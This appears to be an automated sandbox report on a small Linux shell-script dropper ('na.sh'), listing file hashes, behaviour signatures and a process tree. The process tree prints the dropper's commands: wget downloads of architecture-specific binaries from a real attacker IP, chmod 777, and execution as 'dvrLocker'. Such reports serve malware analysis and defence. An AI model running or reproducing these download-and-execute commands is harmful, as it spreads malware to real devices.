Analysis

  • max time kernel
    141s
  • max time network
    134s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240418-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    10-10-2024 07:02

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 4 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:710
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:712
      • /usr/bin/wget
        wget http://185.157.247.125/c/empsl -O -
        2⤵
          PID:714
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Deletes itself
          • Executes dropped EXE
          • Reads process memory
          • Changes its process name
          • Reads runtime system information
          PID:730
        • /usr/bin/wget
          wget http://185.157.247.125/c/emips -O -
          2⤵
          • System Network Configuration Discovery
          PID:733
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:736
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Executes dropped EXE
          PID:738
        • /bin/sh
          /bin/sh ./dvrLocker tplink.new
          2⤵
            PID:738
          • /usr/bin/wget
            wget http://185.157.247.125/c/earm -O -
            2⤵
              PID:746
            • /bin/chmod
              chmod 777 dvrLocker
              2⤵
              • File and Directory Permissions Modification
              PID:747
            • /dvrLocker
              ./dvrLocker tplink.new
              2⤵
              • Executes dropped EXE
              PID:749
            • /bin/sh
              /bin/sh ./dvrLocker tplink.new
              2⤵
                PID:749
              • /usr/bin/wget
                wget http://185.157.247.125/c/earm7 -O -
                2⤵
                  PID:756
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:758
                • /dvrLocker
                  ./dvrLocker tplink.new
                  2⤵
                  • Executes dropped EXE
                  PID:759
                • /bin/sh
                  /bin/sh ./dvrLocker tplink.new
                  2⤵
                    PID:759
                  • /usr/bin/wget
                    wget http://185.157.247.125/c/ex86 -O -
                    2⤵
                      PID:762
                    • /bin/chmod
                      chmod 777 dvrLocker
                      2⤵
                      • File and Directory Permissions Modification
                      PID:763
                    • /dvrLocker
                      ./dvrLocker tplink.new
                      2⤵
                      • Executes dropped EXE
                      PID:764
                    • /bin/sh
                      /bin/sh ./dvrLocker tplink.new
                      2⤵
                        PID:764

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /dvrLocker

    Filesize

    41KB

    MD5

    3cfc76868e26201ac03e0583b7c8aaba

    SHA1

    03436d9d090e1f944fecf60adc1e45f90df20c26

    SHA256

    8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d

    SHA512

    84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2